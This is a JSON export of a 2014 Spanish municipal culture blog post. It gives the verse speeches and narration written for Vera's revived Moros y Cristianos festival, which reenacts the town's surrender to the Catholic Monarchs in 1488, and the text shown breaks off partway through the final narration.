{"id":405,"date":"2014-05-15T10:02:15","date_gmt":"2014-05-15T10:02:15","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=405"},"modified":"2015-11-20T09:25:53","modified_gmt":"2015-11-20T09:25:53","slug":"moros-y-cristianos-de-vera-textos","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/05\/15\/moros-y-cristianos-de-vera-textos\/","title":{"rendered":"MOROS Y CRISTIANOS DE VERA 2014. TEXTOS"},"content":{"rendered":"<p>Un grupo de veratenses se propuso no hace muchos meses volver a\u00a0organizar la fiesta de moros y cristianos y retomar la que se celebraba en el siglo XVI en este mismo Municipio, tal y\u00a0como algunos historiadores han dado a conocer bas\u00e1ndose en documentos de la \u00e9poca. Se pretende rememorar agradecidos y con naturalidad,\u00a0promoviendo la convivencia, sin \u00e1nimo de revanchismo, con entereza y alegr\u00eda, los acontecimientos vividos el 10 de junio de 1488. Es decir: la entrega de la Vera Vieja y, m\u00e1s tarde, de Granada,\u00a0a las tropas cristianas. Una condici\u00f3n fundamental de lo que somos ahora. De c\u00f3mo pensamos. De nuestra creencia o apostas\u00eda.<!--more--><\/p>\n<p>Los organizadores de dicho acto propusieron que fuera un servidor el que escribiera los textos explicativos sobre los acontecimientos ocurridos durante esos a\u00f1os. Ser\u00edan le\u00eddos en la Plaza Mayor de Vera durante la fiesta del s\u00e1bado d\u00eda 7 de junio. \u00c9ste es el resultado de lo estudiado y escrito.<\/p>\n<p>Somos conscientes de que los cuatro discursos no se leer\u00e1n en su integridad el d\u00eda de la representaci\u00f3n, dada su extensi\u00f3n -se leen en un tiempo aproximado de 22 minutos, siendo lo ideal unos 10 minutos-. Se ha decidido por ello que sean publicados en este espacio. Esperamos disfruten de su lectura.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/cidi-yahya-alnayar.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-410\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/cidi-yahya-alnayar-228x300.jpg\" alt=\"cidi yahya alnayar\" width=\"228\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/cidi-yahya-alnayar-228x300.jpg 228w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/cidi-yahya-alnayar.jpg 523w\" sizes=\"(max-width: 228px) 100vw, 228px\" \/><\/a><\/p>\n<p><b>1. DISCURSO DE CIDI YAHYA, ALCAIDE DE VERA<\/b><\/p>\n<p>La paz con vosotros sea. Os habla el cristiano nuevo, Pedro de Granada Venegas, en otro tiempo llamado, Cidi Yahya Alnayar, almeriense de Marchena, se\u00f1or y nieto de reyes, hijo de Ab\u00e9n Cel\u00edn, alcalde y visorrey de Almer\u00eda, adem\u00e1s de alcaide de Vera; el hombre que la entreg\u00f3, que urdi\u00f3 muy sutiles hilos, para evitar ya m\u00e1s viudas, hacer cesar los llantos, las guerras, la miseria, los raptos&#8230;, y dejar crecer las huertas, perdidas a\u00f1o tras a\u00f1o; recoger al fin los frutos, de tanto \u00e1rbol talado&#8230;<\/p>\n<p>En Lanjar\u00f3n, aqu\u00ed me hallo, mil quinientos, y seis a\u00f1os recordando, Al-\u00c1ndalus, nuestra tierra, creada por descontento, de aquellos viejos hispanos, b\u00e9ticos, jud\u00edos, romanos&#8230;; humildes, doblegados por los godos, arist\u00f3cratas crueles, cristianos arrianos, norte\u00f1os, p\u00e1lidos y escasos; aceptaron sin batallas lo que el Profeta ofrec\u00eda: un dios joven, pan para ese d\u00eda, un futuro poco incierto y el naciente imperio isl\u00e1mico.<\/p>\n<p>Y despu\u00e9s de C\u00f3rdoba el poder, triunfo del califato, fronteras, tributos varios, cobrados de los cristianos, que aceptaban la poderosa, soberan\u00eda de su amo. Trescientos a\u00f1os dur\u00f3, llegando presto las taifas, la vanidad entre hermanos, el enemigo que avanza, imponi\u00e9ndonos, a poco, los tributos de las Parias, y llegando hasta Toledo&#8230; Y no tener m\u00e1s remedio, iniciando la busca en \u00c1frica, infantil, primitiva y caliente, a quien pudiera defendernos (almor\u00e1vides y almohades), de los reinos que acercaban, la cruz de lejana Roma, el miedo y la cota de malla.<\/p>\n<p>El inicio del final, mil doscientos, a\u00f1o doce, en Granada replegados, hermosa, fiel, indolente&#8230; Y fue en Tolosa, en las Navas, la derrota, Al-Uqab, presintiendo el mal augurio, de la unida cristiandad. Y saber que todo acaba, todo tiene su final, con condici\u00f3n de vasallos de aquella Castilla frugal, ruda como sus llanos, pero m\u00e1s paciente y tenaz.<\/p>\n<p>De la Cora de Tudmir, Medina Bayra marinera, a ser tierra de nadie, nuestra Vera vieja hasta Lorca, desde Lorca al Almanzora, a poco se convirti\u00f3 en dura tierra, frontera, de cabalgadas, rescates, cautivos \u201cde buena guerra\u201d, y de mala en tiempo de paz, llorando su taha entera, ahumadas, torres costeras, atalayas, y Hu\u00e9rcal y Overa, punta de lanza de un reino, defensa de nuestra tierra, la fortaleza de Nieva, avisando a Granada de cu\u00e1ndo el infiel se acerca. Atajadores con cien ojos, casas fuerte, fortalezas, dialogando con los otros, en la Fuente de la Higuera, a pesar de que los jeques, se empe\u00f1aban en la guerra, contra sus propios hermanos, Boabdil y El Zagal, acaban con ocho siglos, mil cuatrocientos setenta.<\/p>\n<p>Y diez a\u00f1os despu\u00e9s, llegu\u00e9 yo a vuestra Vera, guardando mi secreto, mostrando mi alcaid\u00eda, fiel a Muley Hac\u00e9n, a El Zagal, pactando con el rum\u00ed, Fernando y su buena reina, poco despu\u00e9s de o\u00edr, sufrir cuando les dec\u00edan: \u00abId a decir a vuestros, dos cristianos soberanos, que ya murieron los reyes, que pagaban los erarios, a los reyes trinitarios\u00bb, \u00a1pobres!, entonces pens\u00e9, si a vuestros hijos lanz\u00e1is, a dar guerra perdida, contra esos galileos, y en batalla fratricida, se enzarzar\u00e1n, \u00a1mala lid!, nuestros otrora hermanos. \u00a1Ay!, \u00a1ambicioso Boaddil! La muerte te espera en Fez; all\u00ed sellar\u00e1n tus labios.<\/p>\n<p>Y tal como ocurri\u00f3, a\u00f1os atr\u00e1s, ochocientos, haci\u00e9ndose moro el hispano, el muslim esper\u00f3 al cristiano, harto de tanto fuego, y con grietas en las manos, de tanto rezar a Dios, para cerrar tanto espanto, para enterrar lo podrido, adelantar lo esperado. Y nosotros, nazaritas, jugando, haciendo teatro: el Rey Chico, Boabdil, ya pactando con Fernando, anhelando siempre un trono, que nunca tuvo ganado. Los nazarenos nos daban, grandes treguas por dos a\u00f1os; yo ante mi cu\u00f1ado, que todo segu\u00eda igual (El Zagal), que ser\u00edamos mahometanos. Perdiese ya quien perdiese, yo siempre saldr\u00eda ganando, y la gente de Granada, sin remedio bautizados.<\/p>\n<p>La paz sea con vosotros. Siempre seremos hermanos.<\/p>\n<p>Y siguiendo en este trance, vengan fantasmas a m\u00ed, para aclararos los lances, pasados o por venir, que nos hablen de la Tierra, que yo consent\u00ed en rendir, en buena hora o en mala. Juzgad entonces qui\u00e9n yerra, por el bien de sus gentes, el regalo de mercedes&#8230; y que tiren la primera piedra.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/vera-vieja.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-411\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/vera-vieja-300x226.jpg\" alt=\"vera vieja\" width=\"300\" height=\"226\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/vera-vieja-300x226.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/vera-vieja.jpg 720w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\"><b>2. DISCURSO DE MAR\u00cdA GARC\u00cdA. MORISCA<\/b><\/p>\n<p align=\"justify\">Larga vida teng\u00e1is, tranquila os la d\u00e9 Dios, y yo me presento aqu\u00ed, honrando a Nuestro Se\u00f1or.<\/p>\n<p align=\"justify\">Vos sirve Mar\u00eda Garc\u00eda, anta\u00f1o llamada F\u00e1tima, de Yal\u00ed Aben Yal\u00ed, morisca y buena cristiana. Mil quinientos y seis a\u00f1os, y ahora en Antas me hallo, de este Lugar soy vecina, de que fui hace treinta nacida, de una madre ya expulsada, de esa vieja Vera altiva. Y d\u00edganme, si no fue sue\u00f1o, y si acaso fuera falso, que aquella abuela contaba, era Vera musulmana, tiempo ha ya algunos a\u00f1os.<\/p>\n<p align=\"justify\">En las noches me dec\u00edan, si no estoy del todo errada, si a\u00fan puedo recordallo, que era de cielo claro, que crec\u00eda mucha cebada, y sus pastos abastec\u00edan, a muchas ovejas y cabras. As\u00ed era la Vera vieja, de alacranes y serpientes, donde no llueve casi nunca, la que siglo tras siglo, construimos mano con mano, la del castillo del Cerro, por la que tanto sudamos. Santo lo llamar\u00e1n luego, en tanto la tierra tiemble, un nueve de noviembre, y se faga la del llano.<\/p>\n<p align=\"justify\">Su reato se inundaba, cuando Dios se lo mandaba, dando el lujoso tarqu\u00edn, haciendo crecer moreras; parrales, higueras, palmas&#8230; Y vecinos muy industriosos; alfareros, arrieros, alarifes, mercaderes, que comerciaban con Murcia, por caminos do la suerte, pod\u00edante llevar a la muerte. Gente sencilla y valiente, por suerte pocos ilustres, que daban poco valor, a la vida de los sin nombre.<\/p>\n<p align=\"justify\">Pl\u00e1cida vida tuvieren, si no fuera porque Hac\u00e9n, y de Granada lejanos reyes, enviasen oscuros hombres, para la a ella defender. Porque era tambi\u00e9n Vera, en tanto ciudad nodriza, lugar de paso hacia Hu\u00e9rcal, que fortaleza y c\u00e1rcel ten\u00eda (nuestro cad\u00ed los juzgaba, expiando la culpa tres a\u00f1os), de muchos bastimentos b\u00e1sicos, de la canalla asesina, ballesteros y lanceros, y siempre el deber de otear, la que ver\u00eda m\u00e1s de un d\u00eda, c\u00f3mo se acercaban tropas, cabalgando desde Lorca, da\u00f1ando con correr\u00edas, \u00e9sta nuestra hermosa ribera.<\/p>\n<p align=\"justify\">Y ten\u00eda ostentosa mezquita, con muchas columnas de m\u00e1rmol, vetado de blanco y negro, do rezaban los hermanos. Sus muros ten\u00edan dos puertas, un mes\u00f3n hospitalario, de viento un par de molinos, y aljibes, que eran ya cuatro. As\u00ed, lo que echo a faltar, en este Antas arbolado, es el olor de la mar, ese azul que, dec\u00edan, no hac\u00eda a\u00f1orar la paz, ni encontrar ricos tesoros, ni ir a peregrinar&#8230;<\/p>\n<p align=\"justify\">Ans\u00ed todo termin\u00f3, cuando el noble Yu\u00e7a Cordela, el Alcaide Cidi muy lejos, y El Zagal en Almer\u00eda, presto a defendella, no sin antes comprobar, c\u00f3mo de los 300, la mitad a Baza escapaban, entregase por fin Vera, a los que nos promet\u00edan, riqueza, paz y m\u00e1s calma. En ti esperanzas puestas, \u00a1Garci Laso de la Vega! No te f\u00edes jam\u00e1s del rum\u00ed, su cruz es la espada en la guerra.<\/p>\n<p align=\"justify\">Mas no dur\u00f3 mucho la suerte, pues fuimos expulsados, muy presto del alto fuerte, y puesto que hab\u00edasenos prohibido, habitar cerca del mar, no fuera que ayud\u00e1semos, al africano a cruzar, caminamos r\u00edo arriba, a menos de media legua, no nos fuera a ocurrir, lo que al hebreo sefard\u00ed, tener que esconderse o partir, fingiendo como alma en pena. Con doce barracas de atocha, fundamos Antas la mora, trabajando para la Vera, espero que en buena hora.<\/p>\n<p align=\"justify\">Prometo a Vera volver, siendo esclava de un tal, Cervantes, de Haro o Soler, pues no deseo la libertad, si mis hijos se ven lejos, de \u00e9ste su verdadero hogar. Acoja yo as\u00ed en mi seno, semilla de galileo. Nuestra sangre ser\u00e1 la vuestra, siempre nos tendr\u00e9is muy adentro.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/rodrigo-ponce-de-le\u00f3n-marqu\u00e9s-de-c\u00e1diz.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-413\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/rodrigo-ponce-de-le\u00f3n-marqu\u00e9s-de-c\u00e1diz-264x300.jpg\" alt=\"rodrigo ponce de le\u00f3n marqu\u00e9s de c\u00e1diz\" width=\"264\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/rodrigo-ponce-de-le\u00f3n-marqu\u00e9s-de-c\u00e1diz-264x300.jpg 264w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/rodrigo-ponce-de-le\u00f3n-marqu\u00e9s-de-c\u00e1diz.jpg 538w\" sizes=\"(max-width: 264px) 100vw, 264px\" \/><\/a><\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\"><b>3. [DISCURSO DEL MARQU\u00c9S DE C\u00c1DIZ]<\/b><\/span><\/span><\/p>\n<p><span style=\"font-size: small\">Yo, don Rodrigo Ponce de Le\u00f3n y N\u00fa\u00f1ez, que soy <\/span><\/p>\n<p><span style=\"font-size: small\">\u00faltimo marqu\u00e9s de C\u00e1diz, marqu\u00e9s de Zahara,<\/span><\/p>\n<p><span style=\"font-size: small\">estante en la Ciudad de Lorca, en junio, a d\u00eda siete,<\/span><\/p>\n<p><span style=\"font-size: small\">dar\u00e9 Vera a mi reina y a Cristo la Ciudad de Granada.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">A la espera de partir, rezando, as\u00ed el d\u00eda nazca,<\/span><\/p>\n<p><span style=\"font-size: small\">narrando voy mientras lo que a Vos compete,<\/span><\/p>\n<p><span style=\"font-size: small\">de mis hechos, mis miserias, cosas de armas.<\/span><\/p>\n<p><span style=\"font-size: small\">A cuatro a\u00f1os de aqu\u00ed, me alcanzar\u00e1 la muerte.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Cuatrocientos ochenta, y ocho a\u00f1os, junio, pertrechado,<\/span><\/p>\n<p><span style=\"font-size: small\">desde Sevilla requerido, dirij\u00edme a esta tierra, con valor,<\/span><\/p>\n<p><span style=\"font-size: small\">ochocientos peones y caballos, ricamente enjaezados,<\/span><\/p>\n<p><span style=\"font-size: small\">alta y poderosa Se\u00f1ora, entregar\u00e1n Vera y su alfoz.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\">Y aceptando sin violencias, por argucias, lo pactado<\/span>:<\/span><\/p>\n<p><span style=\"font-size: small\">Presentes est\u00e1n en Murcia, los Reyes Isabel y Fernando,<\/span><\/p>\n<p><span style=\"font-size: small\">y habiendo prometido informar, siete cartas, mi deber,<\/span><\/p>\n<p><span style=\"font-size: small\">preparan v\u00edveres, bastimentos y muchos hombres armados.<\/span><\/p>\n<p><span style=\"font-size: small\">Mi lema de oro, largas letras: ESPERANZA, EN LA FE.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Dudosas fidelidades, me suman los descontentos,<\/span><\/p>\n<p><span style=\"font-size: small\">oigan al fin mi verdad, acl\u00e1rense aqu\u00ed mis yerros:<\/span><\/p>\n<p><span style=\"font-size: small\">en otro tiempo cre\u00ed, evitar serle infiel luchando,<\/span><\/p>\n<p><span style=\"font-size: small\">respet\u00e1ndolo hasta el fin, defendiendo a Enrique IV.<\/span><\/p>\n<p><span style=\"font-size: small\">Luch\u00e9, apost\u00e9 y perd\u00ed. Rectificar es de sabios:<\/span><\/p>\n<p><span style=\"font-size: small\">ayer pleites\u00eda rend\u00ed, a mis buenos reyes santos.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y sobre mi antiguo enemigo, aquel de Medinasidonia,<\/span><\/p>\n<p><span style=\"font-size: small\">ahora ya somos hermanos; dejad de llamarme hip\u00f3crita.<\/span><\/p>\n<p><span style=\"font-size: small\">Al fin qued\u00f3 todo claro, mi vida salv\u00f3 el Guzm\u00e1n;<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Aprende y perdona, Boabdil!; ya todo en ti es vanidad.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\">Sin cr\u00e9dito el Zagal, guerreando en ambos bandos<\/span>:<\/span><\/p>\n<p><span style=\"font-size: small\">dir\u00e1 el cronista muslim, por mor de quitarnos m\u00e9rito:<\/span><\/p>\n<p><span style=\"font-size: small\">\u00abf\u00e1cil batalla fue; se entreg\u00f3 la ajarqu\u00eda sin esfuerzo\u00bb.<\/span><\/p>\n<p><span style=\"font-size: small\">Mas, ma\u00f1as fueron, cuatro siglos, hasta vencer en Toledo.<\/span><\/p>\n<p><span style=\"font-size: small\">La peste nos abre el camino y a Almer\u00eda acude el rey viejo.<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Es \u00e9sta nuestra hora, El Zagal batalla muy lejos!<\/span><\/p>\n<p><span style=\"font-size: small\">El Alcaide Cidi Yahya, a espaldas pact\u00f3 con los nuestros.<\/span><\/p>\n<p><span style=\"font-size: small\">El \u00faltimo ser\u00e1 de Vera, por piedad entreg\u00f3 su reino.<\/span><\/p>\n<p><span style=\"font-size: small\">Bautizado, en buena hora, lo guarde Dios en su seno.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\">Y si dijeren los siglos, venideros, quiz\u00e1 enfermos<\/span>:<\/span><\/p>\n<p><span style=\"font-size: small\">\u00abes Espa\u00f1a un fantasma, su existencia ha sido un sue\u00f1o;<\/span><\/p>\n<p><span style=\"font-size: small\">injusto echar al infiel, arrancar de la tierra a su due\u00f1o\u00bb;<\/span><\/p>\n<p><span style=\"font-size: small\">decid que un s\u00f3lo objetivo, hoy puede m\u00e1s que el acero;<\/span><\/p>\n<p><span style=\"font-size: small\">las armas nunca convencen. Granada es un fruto muerto.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\">Lengua y religi\u00f3n recobren, el germen de nuestro imperio,<\/span><\/span><\/p>\n<p><span style=\"font-size: small\">Hermanando las Espa\u00f1as, cultivando el duro suelo.<\/span><\/p>\n<p><span style=\"font-size: small\">Que no nos rinda el esfuerzo; el olvido no nos pierda.<\/span><\/p>\n<p><span style=\"font-size: small\">Que quiz\u00e1 Dios nos le d\u00e9, m\u00e1s all\u00e1 de allende la tierra.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y sabed que de sus campos, ciudad nodriza es esta Vera.<\/span><\/p>\n<p><span style=\"font-size: small\">Caer\u00e1n las dem\u00e1s, si se entrega, si pronto no las socorren.<\/span><\/p>\n<p><span style=\"font-size: small\">Una clave entre dos reinos, un basti\u00f3n en la frontera.<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Concedan as\u00ed su pend\u00f3n!: una llave entre dos torres.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Ya amanecido es, dos mil lanzas, cuatromil peones.<\/span><\/p>\n<p><span style=\"font-size: small\">Hoy partimos de Lorca, ya las tropas nos esperan.<\/span><\/p>\n<p><span style=\"font-size: small\">Caballeros, los m\u00e1s rezan, portando bellos blasones.<\/span><\/p>\n<p><span style=\"font-size: small\">Esta noche llegaremos, a aquel Pozo de la Higuera.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">All\u00ed daremos pie en tierra, empero no haciendo noche,<\/span><\/p>\n<p><span style=\"font-size: small\">no sea el diablo quiera, que antes de llegar nos hieran.<\/span><\/p>\n<p><span style=\"font-size: small\">Dios nos entregue Vera, que ya vendr\u00e1n otros dones.<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Viva Nuestro Se\u00f1or! \u00a1Dios guarde al rey y a la reina!<\/span><\/p>\n<p align=\"justify\">\u00a0<a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/fernando-de-arag\u00f3n.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-414\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/05\/fernando-de-arag\u00f3n.jpg\" alt=\"fernando de arag\u00f3n\" width=\"220\" height=\"286\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><b>4.ENTREGA DE VERA (NARRADO POR CIDI YAHYA , ARENGA DE PONCE DE LE\u00d3N Y DISCURSO DE FERNANDO EL CAT\u00d3LICO)<\/b><\/span><\/p>\n<p><span style=\"font-size: small\"><b>[<span style=\"text-decoration: underline\">NARRACI\u00d3N DE CIDI YAHYA]<\/span><\/b><\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Prestad atenci\u00f3n hermanos! Soy Yahya Alnayar de nuevo,<\/span><\/p>\n<p><span style=\"font-size: small\">oigan los despistados: el \u00faltimo Alcaide de Vera,<\/span><\/p>\n<p><span style=\"font-size: small\">vuestro m\u00e1s humilde siervo, que entreg\u00f3la estando lejos, <\/span><\/p>\n<p><span style=\"font-size: small\">ofreci\u00e9ndoos la paz. Pedro Granada Venegas.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">El que os pretende narrar, lo ocurrido en esos tiempos,<\/span><\/p>\n<p><span style=\"font-size: small\">lo que hicieron los cristianos, en cruzando la frontera,<\/span><\/p>\n<p><span style=\"font-size: small\">desde el d\u00eda nueve de junio, hasta la entrega del cerro, <\/span><\/p>\n<p><span style=\"font-size: small\">all\u00ed donde los dejamos: en la Fuente de la Higuera.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y diz que lleg\u00f3 a Vera, el marqu\u00e9s Ponce de Le\u00f3n,<\/span><\/p>\n<p><span style=\"font-size: small\">a las seis de la ma\u00f1ana, corriendo el nueve de junio,<\/span><\/p>\n<p><span style=\"font-size: small\">y dirigi\u00e9ndose a sus hombres, alardeando areng\u00f3.<\/span><\/p>\n<p><span style=\"font-size: small\">Ignorando sus palabras, presumimos questo dijo:<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><b>[<span style=\"text-decoration: underline\">ARENGA DE PONCE DE LE\u00d3N<\/span>]:<\/b><\/span><\/p>\n<p><span style=\"font-size: small\">Es esta la hora, soldados valientes,<\/span><\/p>\n<p><span style=\"font-size: small\">de morir o ganar, la eterna fama,<\/span><\/p>\n<p><span style=\"font-size: small\">la m\u00e1s dulce miel que para siempre,<\/span><\/p>\n<p><span style=\"font-size: small\">probar\u00e1n de nosotros las Espa\u00f1as.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Escupid el miedo entre los dientes,<\/span><\/p>\n<p><span style=\"font-size: small\">ruin veneno es con quien se ensa\u00f1a.<\/span><\/p>\n<p><span style=\"font-size: small\">Sabed lo que esperan los creyentes<\/span><\/p>\n<p><span style=\"font-size: small\">de vosotros: que les deis Granada.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Hijos, confiad, no tem\u00e1is el partir.<\/span><\/p>\n<p><span style=\"font-size: small\">Juzgar\u00e1 Nuestro Padre ma\u00f1ana.<\/span><\/p>\n<p><span style=\"font-size: small\">Y sabed que al que no ha de morir<\/span><\/p>\n<p><span style=\"font-size: small\">hoy, ya nunca le hieren las lanzas.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y si es vuestro temor padecer y sufrir,<\/span><\/p>\n<p><span style=\"font-size: small\">mirad c\u00f3mo Cristo muestra sus llagas.<\/span><\/p>\n<p><span style=\"font-size: small\">Muri\u00f3 por nosotros, rezad, sonre\u00edd:<\/span><\/p>\n<p><span style=\"font-size: small\">que a todos Jes\u00fas perdon\u00f3 las faltas.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Por Arag\u00f3n y por Castilla<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Viva el Rey! (repiten las tropas cristianas: \u00a1Viva el Rey!)<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Viva la Reina! (repiten la tropas)<\/span><\/p>\n<p><span style=\"font-size: small\">Vivan los pueblos de Espa\u00f1a (\u00a1viva!, gritan las tropas)<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><b>[<span style=\"text-decoration: underline\">SIGUE NARRANDO CIDI YAHYA<\/span>]:<\/b><\/span><\/p>\n<p><span style=\"font-size: small\">Acabado que hubo, de inflamar los corazones,<\/span><\/p>\n<p><span style=\"font-size: small\">presto mand\u00f3 llamar, al Alcaide y a sus nobles.<\/span><\/p>\n<p><span style=\"font-size: small\">Yu\u00e7a Cordela acudi\u00f3, demostrando gran templanza,<\/span><\/p>\n<p><span style=\"font-size: small\">ausente Yahya Alnayar, como jefe de la plaza.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Valiente trat\u00f3 con ellos, nadie defend\u00eda su espalda;<\/span><\/p>\n<p><span style=\"font-size: small\">la m\u00e1s de su gente huida, fue a refugiarse en Baza,<\/span><\/p>\n<p><span style=\"font-size: small\">avisados d\u00edas antes, de las tropas que llegaban.<\/span><\/p>\n<p><span style=\"font-size: small\">Dudaba la otra mitad, si entregaban sus espadas.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y ser\u00e1 en esta ciudad, en Baza donde se venguen,<\/span><\/p>\n<p><span style=\"font-size: small\">teniendo al Zagal enfrente, de algunas tropas cristianas.<\/span><\/p>\n<p><span style=\"font-size: small\">De aqu\u00ed a un mes ser\u00e1, llorar\u00e1 Montesa su muerte:<\/span><\/p>\n<p><span style=\"font-size: small\">matar\u00e1n al infante Felipe, de Arag\u00f3n y de Navarra.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y negociaron por extenso, casi toda la jornada.<\/span><\/p>\n<p><span style=\"font-size: small\">Yu\u00e7a Cordela trat\u00f3, luch\u00f3 y defendi\u00f3 a su gente.<\/span><\/p>\n<p><span style=\"font-size: small\">A todos los principales, regalar muchas mercedes,<\/span><\/p>\n<p><span style=\"font-size: small\">y humo a los sin nombre, a la sufrida gente llana.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y en acab\u00e1ndose el d\u00eda, poco m\u00e1s se pudo hacer,<\/span><\/p>\n<p><span style=\"font-size: small\">en el fuerte pleito hab\u00eda, entre la gente mansa y armada.<\/span><\/p>\n<p><span style=\"font-size: small\">Entreten\u00eda Yu\u00e7a al de C\u00e1diz, y buenas nuevas, a saber:<\/span><\/p>\n<p><span style=\"font-size: small\">\u00absi Vera cae\u00bb, el Raoz\u00ed promete, \u00abCuevas lo har\u00e1 ma\u00f1ana\u00bb.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Yu\u00e7a volvi\u00f3 al castillo, para evitar nuevos desmanes,<\/span><\/p>\n<p><span style=\"font-size: small\">pronto baja de nuevo, teniendo la decisi\u00f3n tomada.<\/span><\/p>\n<p><span style=\"font-size: small\">Cuatro rehenes cristianos, liberan los musulmanes.<\/span><\/p>\n<p><span style=\"font-size: small\">Ma\u00f1ana la entregar\u00e1n, que hoy ya es noche cerrada.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Fernando lleg\u00f3 a esta tierra, el martes siendo d\u00eda diez,<\/span><\/p>\n<p><span style=\"font-size: small\">de comer ya era hora presta y asent\u00f3 all\u00ed sus reales.<\/span><\/p>\n<p><span style=\"font-size: small\">El Real llamar\u00e9is ma\u00f1ana, a este fecundo paraje.<\/span><\/p>\n<p><span style=\"font-size: small\">Cuatro mil caballeros descansan, sus ansias y su altivez.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y llevaron a Yu\u00e7a a besar, las manos de Su Alteza.<\/span><\/p>\n<p><span style=\"font-size: small\">Lo imitaron a hora de v\u00edsperas, los m\u00e1s de la Vera Vieja.<\/span><\/p>\n<p><span style=\"font-size: small\">De ella lo m\u00e1s granado, recelando, con cautela.<\/span><\/p>\n<p><span style=\"font-size: small\">Les orden\u00f3 don Fernando, entregasen la fortaleza.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y fue andando esa tarde, mostrando su gran pena<\/span><\/p>\n<p><span style=\"font-size: small\">cuando entregaron las llaves, desta su querida tierra.<\/span><\/p>\n<p><span style=\"font-size: small\">Demudados los rostros, cetrinos, ven\u00edan a sus mientes<\/span><\/p>\n<p><span style=\"font-size: small\">los largos a\u00f1os vividos, con todas sus buenas gentes.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Viendo abiertas sus puertas, algunos cristianos ascienden,<\/span><\/p>\n<p><span style=\"font-size: small\">y dando gracias a Dios, toman posesi\u00f3n della.<\/span><\/p>\n<p><span style=\"font-size: small\">Presuroso el buen Rey, a \u00e9l encomend\u00f3 el fuerte:<\/span><\/p>\n<p><span style=\"font-size: small\">al mayordomo del duque de Alba. GarciLasso de la Vega.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y ans\u00ed se har\u00e1 todo el resto, dispuso la Providencia.<\/span><\/p>\n<p><span style=\"font-size: small\">Y prestos consiguieron, tambi\u00e9n se entregase 